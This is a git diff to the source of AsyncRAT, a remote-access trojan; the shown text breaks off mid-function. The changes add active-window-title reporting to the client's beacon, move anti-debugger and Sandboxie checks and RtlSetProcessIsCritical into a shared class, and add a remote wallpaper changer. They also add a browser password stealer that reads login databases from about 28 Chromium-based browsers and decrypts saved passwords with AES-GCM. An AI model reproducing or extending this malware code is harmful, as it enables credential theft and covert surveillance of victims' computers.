diff --git a/AsyncRAT-C#/Client/Client.csproj b/AsyncRAT-C#/Client/Client.csproj
index 87c91cc..2dc329d 100644
--- a/AsyncRAT-C#/Client/Client.csproj
+++ b/AsyncRAT-C#/Client/Client.csproj
@@ -80,11 +80,11 @@
-
+
diff --git a/AsyncRAT-C#/Client/Connection/ClientSocket.cs b/AsyncRAT-C#/Client/Connection/ClientSocket.cs
index f49ff6b..67103e2 100644
--- a/AsyncRAT-C#/Client/Connection/ClientSocket.cs
+++ b/AsyncRAT-C#/Client/Connection/ClientSocket.cs
@@ -256,7 +256,7 @@ namespace Client.Connection
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "Ping";
- msgpack.ForcePathObject("Message").AsString = $"MINER {SetRegistry.GetValue(Settings.Hwid) ?? "0"}";
+ msgpack.ForcePathObject("Message").AsString = Methods.GetActiveWindowTitle();
Send(msgpack.Encode2Bytes());
Ping?.Dispose();
Interval = 0;
diff --git a/AsyncRAT-C#/Client/Helper/Anti_Analysis.cs b/AsyncRAT-C#/Client/Helper/Anti_Analysis.cs
index c58fa2e..8a5eb8f 100644
--- a/AsyncRAT-C#/Client/Helper/Anti_Analysis.cs
+++ b/AsyncRAT-C#/Client/Helper/Anti_Analysis.cs
@@ -80,7 +80,7 @@ namespace Client.Helper
bool isDebuggerPresent = false;
try
{
- CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isDebuggerPresent);
+ NativeMethods.CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isDebuggerPresent);
return isDebuggerPresent;
}
catch
@@ -93,7 +93,7 @@ namespace Client.Helper
{
try
{
- if (GetModuleHandle("SbieDll.dll").ToInt32() != 0)
+ if (NativeMethods.GetModuleHandle("SbieDll.dll").ToInt32() != 0)
return true;
else
return false;
@@ -105,10 +105,5 @@ namespace Client.Helper
}
- [DllImport("kernel32.dll")]
- public static extern IntPtr GetModuleHandle(string lpModuleName);
-
- [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
- static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool isDebuggerPresent);
}
}
diff --git a/AsyncRAT-C#/Client/Helper/IdSender.cs b/AsyncRAT-C#/Client/Helper/IdSender.cs
index 2375ab0..bfbc47f 100644
--- a/AsyncRAT-C#/Client/Helper/IdSender.cs
+++ b/AsyncRAT-C#/Client/Helper/IdSender.cs
@@ -20,7 +20,7 @@ namespace Client.Helper
msgpack.ForcePathObject("Path").AsString = Application.ExecutablePath;
msgpack.ForcePathObject("Version").AsString = Settings.Version;
msgpack.ForcePathObject("Admin").AsString = Methods.IsAdmin().ToString().ToLower().Replace("true", "Admin").Replace("false", "User");
- msgpack.ForcePathObject("Performance").AsString = $"MINER {SetRegistry.GetValue(Settings.Hwid) ?? "0"}";
+ msgpack.ForcePathObject("Performance").AsString = "...";
msgpack.ForcePathObject("Pastebin").AsString = Settings.Pastebin;
msgpack.ForcePathObject("Antivirus").AsString = Methods.Antivirus();
msgpack.ForcePathObject("Installed").AsString = new FileInfo(Application.ExecutablePath).LastWriteTime.ToUniversalTime().ToString();
diff --git a/AsyncRAT-C#/Client/Helper/Methods.cs b/AsyncRAT-C#/Client/Helper/Methods.cs
index 8ca507b..1e673a4 100644
--- a/AsyncRAT-C#/Client/Helper/Methods.cs
+++ b/AsyncRAT-C#/Client/Helper/Methods.cs
@@ -5,6 +5,8 @@ using System.Management;
using System.Security.Principal;
using System.Drawing.Imaging;
using System.Runtime.InteropServices;
+using static Client.Helper.NativeMethods;
+using System.Text;
namespace Client.Helper
{
@@ -61,8 +63,7 @@ namespace Client.Helper
return null;
}
- [DllImport("kernel32.dll", SetLastError = true)]
- public static extern EXECUTION_STATE SetThreadExecutionState(EXECUTION_STATE esFlags);
+
public static void PreventSleep()
{
try
@@ -72,11 +73,20 @@ namespace Client.Helper
catch { }
}
- public enum EXECUTION_STATE : uint
+ public static string GetActiveWindowTitle()
{
- ES_CONTINUOUS = 0x80000000,
- ES_DISPLAY_REQUIRED = 0x00000002,
- ES_SYSTEM_REQUIRED = 0x00000001
+ try
+ {
+ const int nChars = 256;
+ StringBuilder buff = new StringBuilder(nChars);
+ IntPtr handle = GetForegroundWindow();
+ if (GetWindowText(handle, buff, nChars) > 0)
+ {
+ return buff.ToString();
+ }
+ }
+ catch { }
+ return "";
}
}
}
diff --git a/AsyncRAT-C#/Client/Helper/NativeMethods.cs b/AsyncRAT-C#/Client/Helper/NativeMethods.cs
new file mode 100644
index 0000000..d8f983e
--- /dev/null
+++ b/AsyncRAT-C#/Client/Helper/NativeMethods.cs
@@ -0,0 +1,34 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Runtime.InteropServices;
+using System.Text;
+
+namespace Client.Helper
+{
+ public static class NativeMethods
+ {
+ [DllImport("user32.dll")]
+ public static extern IntPtr GetForegroundWindow();
+ [DllImport("user32.dll")]
+ public static extern int GetWindowText(IntPtr hWnd, StringBuilder text, int count);
+
+
+ [DllImport("kernel32.dll")]
+ public static extern IntPtr GetModuleHandle(string lpModuleName);
+ [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
+ public static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool isDebuggerPresent);
+
+ [DllImport("kernel32.dll", SetLastError = true)]
+ public static extern EXECUTION_STATE SetThreadExecutionState(EXECUTION_STATE esFlags);
+ public enum EXECUTION_STATE : uint
+ {
+ ES_CONTINUOUS = 0x80000000,
+ ES_DISPLAY_REQUIRED = 0x00000002,
+ ES_SYSTEM_REQUIRED = 0x00000001
+ }
+
+ [DllImport("ntdll.dll", SetLastError = true)]
+ public static extern void RtlSetProcessIsCritical(UInt32 v1, UInt32 v2, UInt32 v3);
+ }
+}
diff --git a/AsyncRAT-C#/Client/Helper/ProcessCritical.cs b/AsyncRAT-C#/Client/Helper/ProcessCritical.cs
index d6d62bc..513ec15 100644
--- a/AsyncRAT-C#/Client/Helper/ProcessCritical.cs
+++ b/AsyncRAT-C#/Client/Helper/ProcessCritical.cs
@@ -20,7 +20,7 @@ namespace Client.Helper
{
SystemEvents.SessionEnding += new SessionEndingEventHandler(SystemEvents_SessionEnding);
Process.EnterDebugMode();
- RtlSetProcessIsCritical(1, 0, 0);
+ Helper.NativeMethods.RtlSetProcessIsCritical(1, 0, 0);
}
catch { }
}
@@ -28,7 +28,7 @@ namespace Client.Helper
{
try
{
- RtlSetProcessIsCritical(0, 0, 0);
+ NativeMethods.RtlSetProcessIsCritical(0, 0, 0);
}
catch
{
@@ -38,10 +38,5 @@ namespace Client.Helper
}
}
}
-
- #region "Native Methods"
- [DllImport("ntdll.dll", SetLastError = true)]
- private static extern void RtlSetProcessIsCritical(UInt32 v1, UInt32 v2, UInt32 v3);
- #endregion
}
}
diff --git a/AsyncRAT-C#/Client/Program.cs b/AsyncRAT-C#/Client/Program.cs
index 9422cd9..93c34d3 100644
--- a/AsyncRAT-C#/Client/Program.cs
+++ b/AsyncRAT-C#/Client/Program.cs
@@ -40,7 +40,7 @@ namespace Client
Methods.PreventSleep(); //prevent pc to idle\sleep
- new CheckMiner().GetProcess(); //check miner status
+ //new CheckMiner().GetProcess(); //check miner status
}
catch { }
diff --git a/AsyncRAT-C#/Plugin/Extra/Extra/Extra.csproj b/AsyncRAT-C#/Plugin/Extra/Extra/Extra.csproj
index 0a82132..4453ae4 100644
--- a/AsyncRAT-C#/Plugin/Extra/Extra/Extra.csproj
+++ b/AsyncRAT-C#/Plugin/Extra/Extra/Extra.csproj
@@ -35,6 +35,7 @@
+
@@ -46,6 +47,7 @@
+
diff --git a/AsyncRAT-C#/Plugin/Extra/Extra/Handler/Wallpaper.cs b/AsyncRAT-C#/Plugin/Extra/Extra/Handler/Wallpaper.cs
new file mode 100644
index 0000000..5417529
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Extra/Extra/Handler/Wallpaper.cs
@@ -0,0 +1,40 @@
+using Microsoft.Win32;
+using System;
+using System.Collections.Generic;
+using System.Drawing;
+using System.Drawing.Imaging;
+using System.IO;
+using System.Linq;
+using System.Runtime.InteropServices;
+using System.Text;
+
+namespace Plugin.Handler
+{
+ public class Wallpaper
+ {
+ [DllImport("user32.dll")]
+ public static extern uint SystemParametersInfo(uint action, uint uParam, string vParam, uint winIni);
+ public static readonly uint SPI_SETDESKWALLPAPER = 0x14;
+ public static readonly uint SPIF_UPDATEINIFILE = 0x01;
+ public static readonly uint SPIF_SENDWININICHANGE = 0x02;
+
+ public void Change(byte[] img, string exe)
+ {
+ string path1 = Path.Combine(Path.GetTempFileName() + exe);
+ string path2 = Path.Combine(Path.GetTempFileName() + exe);
+ File.WriteAllBytes(path1, img);
+
+ using (Bitmap bmp = new Bitmap(path1))
+ using (Graphics graphics = Graphics.FromImage(bmp))
+ {
+ bmp.Save(path2, ImageFormat.Bmp);
+ }
+ using (RegistryKey key = Registry.CurrentUser.OpenSubKey(@"Control Panel\Desktop", true))
+ {
+ key.SetValue("WallpaperStyle", 2.ToString());
+ key.SetValue("TileWallpaper", 0.ToString());
+ }
+ SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, path2, SPIF_UPDATEINIFILE | SPIF_SENDWININICHANGE);
+ }
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/Extra/Extra/Packet.cs b/AsyncRAT-C#/Plugin/Extra/Extra/Packet.cs
index 0ee88e8..93d0bd5 100644
--- a/AsyncRAT-C#/Plugin/Extra/Extra/Packet.cs
+++ b/AsyncRAT-C#/Plugin/Extra/Extra/Packet.cs
@@ -3,6 +3,7 @@ using Plugin.MessagePack;
using System;
using System.Collections.Generic;
using System.Diagnostics;
+using System.Drawing;
using System.IO;
using System.Linq;
using System.Management;
@@ -23,6 +24,12 @@ namespace Plugin
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
+ case "wallpaper":
+ {
+ new Wallpaper().Change(unpack_msgpack.ForcePathObject("Image").GetAsBytes(), unpack_msgpack.ForcePathObject("Exe").AsString);
+ break;
+ }
+
case "visitURL":
{
string url = unpack_msgpack.ForcePathObject("URL").AsString;
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/Account.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/Account.cs
new file mode 100644
index 0000000..2719d2d
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/Account.cs
@@ -0,0 +1,18 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+
+namespace Plugin.Browsers.Chromium
+{
+ public class Account
+ {
+ public string UserName { get; set; }
+
+ public string Password { get; set; }
+
+ public string URL { get; set; }
+
+ public string Application { get; set; }
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/AesGcm.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/AesGcm.cs
new file mode 100644
index 0000000..1a1ae56
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/AesGcm.cs
@@ -0,0 +1,137 @@
+using System;
+using System.Collections.Generic;
+using System.Runtime.InteropServices;
+using System.Security.Cryptography;
+using System.Text;
+
+
+namespace Plugin.Browsers.Chromium
+{
+ //AES GCM from https://github.com/dvsekhvalnov/jose-jwt
+ class AesGcm
+ {
+ public byte[] Decrypt(byte[] key, byte[] iv, byte[] aad, byte[] cipherText, byte[] authTag)
+ {
+ IntPtr hAlg = OpenAlgorithmProvider(BCrypt.BCRYPT_AES_ALGORITHM, BCrypt.MS_PRIMITIVE_PROVIDER, BCrypt.BCRYPT_CHAIN_MODE_GCM);
+ IntPtr hKey, keyDataBuffer = ImportKey(hAlg, key, out hKey);
+
+ byte[] plainText;
+
+ var authInfo = new BCrypt.BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO(iv, aad, authTag);
+ using (authInfo)
+ {
+ byte[] ivData = new byte[MaxAuthTagSize(hAlg)];
+
+ int plainTextSize = 0;
+
+ uint status = BCrypt.BCryptDecrypt(hKey, cipherText, cipherText.Length, ref authInfo, ivData, ivData.Length, null, 0, ref plainTextSize, 0x0);
+
+ if (status != BCrypt.ERROR_SUCCESS)
+ throw new CryptographicException(string.Format("BCrypt.BCryptDecrypt() (get size) failed with status code: {0}", status));
+
+ plainText = new byte[plainTextSize];
+
+ status = BCrypt.BCryptDecrypt(hKey, cipherText, cipherText.Length, ref authInfo, ivData, ivData.Length, plainText, plainText.Length, ref plainTextSize, 0x0);
+
+ if (status == BCrypt.STATUS_AUTH_TAG_MISMATCH)
+ throw new CryptographicException("BCrypt.BCryptDecrypt(): authentication tag mismatch");
+
+ if (status != BCrypt.ERROR_SUCCESS)
+ throw new CryptographicException(string.Format("BCrypt.BCryptDecrypt() failed with status code:{0}", status));
+ }
+
+ BCrypt.BCryptDestroyKey(hKey);
+ Marshal.FreeHGlobal(keyDataBuffer);
+ BCrypt.BCryptCloseAlgorithmProvider(hAlg, 0x0);
+
+ return plainText;
+ }
+
+ private int MaxAuthTagSize(IntPtr hAlg)
+ {
+ byte[] tagLengthsValue = GetProperty(hAlg, BCrypt.BCRYPT_AUTH_TAG_LENGTH);
+
+ return BitConverter.ToInt32(new[] { tagLengthsValue[4], tagLengthsValue[5], tagLengthsValue[6], tagLengthsValue[7] }, 0);
+ }
+
+ private IntPtr OpenAlgorithmProvider(string alg, string provider, string chainingMode)
+ {
+ IntPtr hAlg = IntPtr.Zero;
+
+ uint status = BCrypt.BCryptOpenAlgorithmProvider(out hAlg, alg, provider, 0x0);
+
+ if (status != BCrypt.ERROR_SUCCESS)
+ throw new CryptographicException(string.Format("BCrypt.BCryptOpenAlgorithmProvider() failed with status code:{0}", status));
+
+ byte[] chainMode = Encoding.Unicode.GetBytes(chainingMode);
+ status = BCrypt.BCryptSetAlgorithmProperty(hAlg, BCrypt.BCRYPT_CHAINING_MODE, chainMode, chainMode.Length, 0x0);
+
+ if (status != BCrypt.ERROR_SUCCESS)
+ throw new CryptographicException(string.Format("BCrypt.BCryptSetAlgorithmProperty(BCrypt.BCRYPT_CHAINING_MODE, BCrypt.BCRYPT_CHAIN_MODE_GCM) failed with status code:{0}", status));
+
+ return hAlg;
+ }
+
+ private IntPtr ImportKey(IntPtr hAlg, byte[] key, out IntPtr hKey)
+ {
+ byte[] objLength = GetProperty(hAlg, BCrypt.BCRYPT_OBJECT_LENGTH);
+
+ int keyDataSize = BitConverter.ToInt32(objLength, 0);
+
+ IntPtr keyDataBuffer = Marshal.AllocHGlobal(keyDataSize);
+
+ byte[] keyBlob = Concat(BCrypt.BCRYPT_KEY_DATA_BLOB_MAGIC, BitConverter.GetBytes(0x1), BitConverter.GetBytes(key.Length), key);
+
+ uint status = BCrypt.BCryptImportKey(hAlg, IntPtr.Zero, BCrypt.BCRYPT_KEY_DATA_BLOB, out hKey, keyDataBuffer, keyDataSize, keyBlob, keyBlob.Length, 0x0);
+
+ if (status != BCrypt.ERROR_SUCCESS)
+ throw new CryptographicException(string.Format("BCrypt.BCryptImportKey() failed with status code:{0}", status));
+
+ return keyDataBuffer;
+ }
+
+ private byte[] GetProperty(IntPtr hAlg, string name)
+ {
+ int size = 0;
+
+ uint status = BCrypt.BCryptGetProperty(hAlg, name, null, 0, ref size, 0x0);
+
+ if (status != BCrypt.ERROR_SUCCESS)
+ throw new CryptographicException(string.Format("BCrypt.BCryptGetProperty() (get size) failed with status code:{0}", status));
+
+ byte[] value = new byte[size];
+
+ status = BCrypt.BCryptGetProperty(hAlg, name, value, value.Length, ref size, 0x0);
+
+ if (status != BCrypt.ERROR_SUCCESS)
+ throw new CryptographicException(string.Format("BCrypt.BCryptGetProperty() failed with status code:{0}", status));
+
+ return value;
+ }
+
+ public byte[] Concat(params byte[][] arrays)
+ {
+ int len = 0;
+
+ foreach (byte[] array in arrays)
+ {
+ if (array == null)
+ continue;
+ len += array.Length;
+ }
+
+ byte[] result = new byte[len - 1 + 1];
+ int offset = 0;
+
+ foreach (byte[] array in arrays)
+ {
+ if (array == null)
+ continue;
+ Buffer.BlockCopy(array, 0, result, offset, array.Length);
+ offset += array.Length;
+ }
+
+ return result;
+ }
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/BCrypt.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/BCrypt.cs
new file mode 100644
index 0000000..5603a84
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/BCrypt.cs
@@ -0,0 +1,179 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+using System.Runtime.InteropServices;
+using System.Security.Cryptography;
+
+namespace Plugin.Browsers.Chromium
+{
+ public static class BCrypt
+ {
+ public const uint ERROR_SUCCESS = 0x00000000;
+ public const uint BCRYPT_PAD_PSS = 8;
+ public const uint BCRYPT_PAD_OAEP = 4;
+
+ public static readonly byte[] BCRYPT_KEY_DATA_BLOB_MAGIC = BitConverter.GetBytes(0x4d42444b);
+
+ public static readonly string BCRYPT_OBJECT_LENGTH = "ObjectLength";
+ public static readonly string BCRYPT_CHAIN_MODE_GCM = "ChainingModeGCM";
+ public static readonly string BCRYPT_AUTH_TAG_LENGTH = "AuthTagLength";
+ public static readonly string BCRYPT_CHAINING_MODE = "ChainingMode";
+ public static readonly string BCRYPT_KEY_DATA_BLOB = "KeyDataBlob";
+ public static readonly string BCRYPT_AES_ALGORITHM = "AES";
+
+ public static readonly string MS_PRIMITIVE_PROVIDER = "Microsoft Primitive Provider";
+
+ public static readonly int BCRYPT_AUTH_MODE_CHAIN_CALLS_FLAG = 0x00000001;
+ public static readonly int BCRYPT_INIT_AUTH_MODE_INFO_VERSION = 0x00000001;
+
+ public static readonly uint STATUS_AUTH_TAG_MISMATCH = 0xC000A002;
+
+ [StructLayout(LayoutKind.Sequential)]
+ public struct BCRYPT_PSS_PADDING_INFO
+ {
+ public BCRYPT_PSS_PADDING_INFO(string pszAlgId, int cbSalt)
+ {
+ this.pszAlgId = pszAlgId;
+ this.cbSalt = cbSalt;
+ }
+
+ [MarshalAs(UnmanagedType.LPWStr)]
+ public string pszAlgId;
+ public int cbSalt;
+ }
+
+ [StructLayout(LayoutKind.Sequential)]
+ public struct BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO : IDisposable
+ {
+ public int cbSize;
+ public int dwInfoVersion;
+ public IntPtr pbNonce;
+ public int cbNonce;
+ public IntPtr pbAuthData;
+ public int cbAuthData;
+ public IntPtr pbTag;
+ public int cbTag;
+ public IntPtr pbMacContext;
+ public int cbMacContext;
+ public int cbAAD;
+ public long cbData;
+ public int dwFlags;
+
+ public BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO(byte[] iv, byte[] aad, byte[] tag) : this()
+ {
+ dwInfoVersion = BCRYPT_INIT_AUTH_MODE_INFO_VERSION;
+ cbSize = Marshal.SizeOf(typeof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO));
+
+ if (iv != null)
+ {
+ cbNonce = iv.Length;
+ pbNonce = Marshal.AllocHGlobal(cbNonce);
+ Marshal.Copy(iv, 0, pbNonce, cbNonce);
+ }
+
+ if (aad != null)
+ {
+ cbAuthData = aad.Length;
+ pbAuthData = Marshal.AllocHGlobal(cbAuthData);
+ Marshal.Copy(aad, 0, pbAuthData, cbAuthData);
+ }
+
+ if (tag != null)
+ {
+ cbTag = tag.Length;
+ pbTag = Marshal.AllocHGlobal(cbTag);
+ Marshal.Copy(tag, 0, pbTag, cbTag);
+
+ cbMacContext = tag.Length;
+ pbMacContext = Marshal.AllocHGlobal(cbMacContext);
+ }
+ }
+
+ public void Dispose()
+ {
+ if (pbNonce != IntPtr.Zero) Marshal.FreeHGlobal(pbNonce);
+ if (pbTag != IntPtr.Zero) Marshal.FreeHGlobal(pbTag);
+ if (pbAuthData != IntPtr.Zero) Marshal.FreeHGlobal(pbAuthData);
+ if (pbMacContext != IntPtr.Zero) Marshal.FreeHGlobal(pbMacContext);
+ }
+ }
+
+ [StructLayout(LayoutKind.Sequential)]
+ public struct BCRYPT_KEY_LENGTHS_STRUCT
+ {
+ public int dwMinLength;
+ public int dwMaxLength;
+ public int dwIncrement;
+ }
+
+ [StructLayout(LayoutKind.Sequential)]
+ public struct BCRYPT_OAEP_PADDING_INFO
+ {
+ public BCRYPT_OAEP_PADDING_INFO(string alg)
+ {
+ pszAlgId = alg;
+ pbLabel = IntPtr.Zero;
+ cbLabel = 0;
+ }
+
+ [MarshalAs(UnmanagedType.LPWStr)]
+ public string pszAlgId;
+ public IntPtr pbLabel;
+ public int cbLabel;
+ }
+
+ [DllImport("bcrypt.dll")]
+ public static extern uint BCryptOpenAlgorithmProvider(out IntPtr phAlgorithm,
+ [MarshalAs(UnmanagedType.LPWStr)] string pszAlgId,
+ [MarshalAs(UnmanagedType.LPWStr)] string pszImplementation,
+ uint dwFlags);
+
+ [DllImport("bcrypt.dll")]
+ public static extern uint BCryptCloseAlgorithmProvider(IntPtr hAlgorithm, uint flags);
+
+ [DllImport("bcrypt.dll", EntryPoint = "BCryptGetProperty")]
+ public static extern uint BCryptGetProperty(IntPtr hObject, [MarshalAs(UnmanagedType.LPWStr)] string pszProperty, byte[] pbOutput, int cbOutput, ref int pcbResult, uint flags);
+
+ [DllImport("bcrypt.dll", EntryPoint = "BCryptSetProperty")]
+ internal static extern uint BCryptSetAlgorithmProperty(IntPtr hObject, [MarshalAs(UnmanagedType.LPWStr)] string pszProperty, byte[] pbInput, int cbInput, int dwFlags);
+
+
+ [DllImport("bcrypt.dll")]
+ public static extern uint BCryptImportKey(IntPtr hAlgorithm,
+ IntPtr hImportKey,
+ [MarshalAs(UnmanagedType.LPWStr)] string pszBlobType,
+ out IntPtr phKey,
+ IntPtr pbKeyObject,
+ int cbKeyObject,
+ byte[] pbInput, //blob of type BCRYPT_KEY_DATA_BLOB + raw key data = (dwMagic (4 bytes) | uint dwVersion (4 bytes) | cbKeyData (4 bytes) | data)
+ int cbInput,
+ uint dwFlags);
+
+ [DllImport("bcrypt.dll")]
+ public static extern uint BCryptDestroyKey(IntPtr hKey);
+
+ [DllImport("bcrypt.dll")]
+ public static extern uint BCryptEncrypt(IntPtr hKey,
+ byte[] pbInput,
+ int cbInput,
+ ref BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO pPaddingInfo,
+ byte[] pbIV, int cbIV,
+ byte[] pbOutput,
+ int cbOutput,
+ ref int pcbResult,
+ uint dwFlags);
+
+ [DllImport("bcrypt.dll")]
+ internal static extern uint BCryptDecrypt(IntPtr hKey,
+ byte[] pbInput,
+ int cbInput,
+ ref BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO pPaddingInfo,
+ byte[] pbIV,
+ int cbIV,
+ byte[] pbOutput,
+ int cbOutput,
+ ref int pcbResult,
+ int dwFlags);
+ }
+
+}
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/Chromium.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/Chromium.cs
index 0d48f57..873fb5e 100644
--- a/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/Chromium.cs
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/Chromium.cs
@@ -2,6 +2,7 @@
using System.Collections.Generic;
using System.IO;
using System.Runtime.InteropServices;
+using System.Security.Cryptography;
using System.Text;
using Plugin.Browsers.Chromium;
@@ -9,6 +10,8 @@ namespace Plugin.Browsers.Chromium
{
public class Chromium
{
+ public static string LocalApplicationData = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);
+ public static string ApplicationData = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
public void CookiesRecovery(StringBuilder Coocks)
{
@@ -118,154 +121,310 @@ namespace Plugin.Browsers.Chromium
}
}
-
- public void Recovery(StringBuilder Pass)
+ public static StringBuilder Recovery(StringBuilder stringBuilder)
{
- try
+ Dictionary ChromiumPaths = new Dictionary()
{
- foreach (string str in this.GetAppDataFolders())
+ {
+ "Chrome",
+ LocalApplicationData + @"\Google\Chrome\User Data"
+ },
+ {
+ "Opera",
+ Path.Combine(ApplicationData, @"Opera Software\Opera Stable")
+ },
+ {
+ "Yandex",
+ Path.Combine(LocalApplicationData, @"Yandex\YandexBrowser\User Data")
+ },
+ {
+ "360 Browser",
+ LocalApplicationData + @"\360Chrome\Chrome\User Data"
+ },
+ {
+ "Comodo Dragon",
+ Path.Combine(LocalApplicationData, @"Comodo\Dragon\User Data")
+ },
+ {
+ "CoolNovo",
+ Path.Combine(LocalApplicationData, @"MapleStudio\ChromePlus\User Data")
+ },
+ {
+ "SRWare Iron",
+ Path.Combine(LocalApplicationData, @"Chromium\User Data")
+ },
+ {
+ "Torch Browser",
+ Path.Combine(LocalApplicationData, @"Torch\User Data")
+ },
+ {
+ "Brave Browser",
+ Path.Combine(LocalApplicationData, @"BraveSoftware\Brave-Browser\User Data")
+ },
+ {
+ "Iridium Browser",
+ LocalApplicationData + @"\Iridium\User Data"
+ },
+ {
+ "7Star",
+ Path.Combine(LocalApplicationData, @"7Star\7Star\User Data")
+ },
+ {
+ "Amigo",
+ Path.Combine(LocalApplicationData, @"Amigo\User Data")
+ },
+ {
+ "CentBrowser",
+ Path.Combine(LocalApplicationData, @"CentBrowser\User Data")
+ },
+ {
+ "Chedot",
+ Path.Combine(LocalApplicationData, @"Chedot\User Data")
+ },
+ {
+ "CocCoc",
+ Path.Combine(LocalApplicationData, @"CocCoc\Browser\User Data")
+ },
+ {
+ "Elements Browser",
+ Path.Combine(LocalApplicationData, @"Elements Browser\User Data")
+ },
+ {
+ "Epic Privacy Browser",
+ Path.Combine(LocalApplicationData, @"Epic Privacy Browser\User Data")
+ },
+ {
+ "Kometa",
+ Path.Combine(LocalApplicationData, @"Kometa\User Data")
+ },
+ {
+ "Orbitum",
+ Path.Combine(LocalApplicationData, @"Orbitum\User Data")
+ },
+ {
+ "Sputnik",
+ Path.Combine(LocalApplicationData, @"Sputnik\Sputnik\User Data")
+ },
+ {
+ "uCozMedia",
+ Path.Combine(LocalApplicationData, @"uCozMedia\Uran\User Data")
+ },
+ {
+ "Vivaldi",
+ Path.Combine(LocalApplicationData, @"Vivaldi\User Data")
+ },
+ {
+ "Sleipnir 6",
+ Path.Combine(ApplicationData, @"Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer")
+ },
+ {
+ "Citrio",
+ Path.Combine(LocalApplicationData, @"CatalinaGroup\Citrio\User Data")
+ },
+ {
+ "Coowon",
+ Path.Combine(LocalApplicationData, @"Coowon\Coowon\User Data")
+ },
+ {
+ "Liebao Browser",
+ Path.Combine(LocalApplicationData, @"liebao\User Data")
+ },
+ {
+ "QIP Surf",
+ Path.Combine(LocalApplicationData, @"QIP Surf\User Data")
+ },
+ {
+ "Edge Chromium",
+ Path.Combine(LocalApplicationData, @"Microsoft\Edge\User Data")
+ }
+ };
+
+ var list = new List();
+
+ foreach (var item in ChromiumPaths)
+ list.AddRange(Accounts(item.Value, item.Key));
+
+ foreach (var b in list)
+ {
+ stringBuilder.Append("Url: " + b.URL + "\n");
+ stringBuilder.Append("Username: " + b.UserName + "\n");
+ stringBuilder.Append("Password: " + b.Password + "\n");
+ stringBuilder.Append("Application: " + b.Application + "\n");
+ stringBuilder.Append("=============================" + "\n");
+ }
+
+ return stringBuilder;
+ }
+
+ private static List Accounts(string path, string browser, string table = "logins")
+ {
+
+ //Get all created profiles from browser path
+ List loginDataFiles = GetAllProfiles(path);
+
+ List data = new List();
+
+ foreach (string loginFile in loginDataFiles.ToArray())
+ {
+ if (!File.Exists(loginFile))
+ continue;
+
+ SQLiteHandler SQLDatabase;
+
+ try
+ {
+ SQLDatabase = new SQLiteHandler(loginFile); //Open database with Sqlite
+ }
+ catch (System.Exception ex)
+ {
+ Console.WriteLine(ex.ToString());
+ continue;
+ }
+
+ if (!SQLDatabase.ReadTable(table))
+ continue;
+
+ for (int I = 0; I <= SQLDatabase.GetRowCount() - 1; I++)
{
try
{
- string[] browser = {
- str + "\\Local\\Google\\Chrome\\User Data\\Default\\Login Data",
- str + "\\Roaming\\Opera Software\\Opera Stable\\Login Data",
- str + "\\Local\\Vivaldi\\User Data\\Default\\Login Data",
- str + "\\Local\\Chromium\\User Data\\Default\\Login Data",
- str + "\\Local\\Torch\\User Data\\Default\\Login Data",
- str + "\\Local\\Comodo\\Dragon\\User Data\\Default\\Login Data",
- str + "\\Local\\Xpom\\User Data\\Default\\Login Data",
- str + "\\Local\\Orbitum\\User Data\\Default\\Login Data",
- str + "\\Local\\Kometa\\User Data\\Default\\Login Data",
- str + "\\Local\\Amigo\\User Data\\Default\\Login Data",
- str + "\\Local\\Nichrome\\User Data\\Default\\Login Data",
- str + "\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Login Data",
- str + "\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Ya Login Data",
- };
+ //Get values with row number and column name
+ string host = SQLDatabase.GetValue(I, "origin_url");
+ string username = SQLDatabase.GetValue(I, "username_value");
+ string password = SQLDatabase.GetValue(I, "password_value");
- int selected = 0;
- foreach (string b in browser)
+ if (password != null)
{
- if (File.Exists(b))
+ //check v80 password signature. its starting with v10 or v11
+ if (password.StartsWith("v10") || password.StartsWith("v11"))
{
- SQLiteHandler sqliteHandler = new SQLiteHandler(b);
- try
- {
- sqliteHandler.ReadTable("logins");
- }
- catch
- {
- }
+ //Local State file located in the parent folder of profile folder.
+ byte[] masterKey = GetMasterKey(Directory.GetParent(loginFile).Parent.FullName);
- switch (selected)
- {
- case 0:
- Pass.Append("\n== Chrome ==========\n");
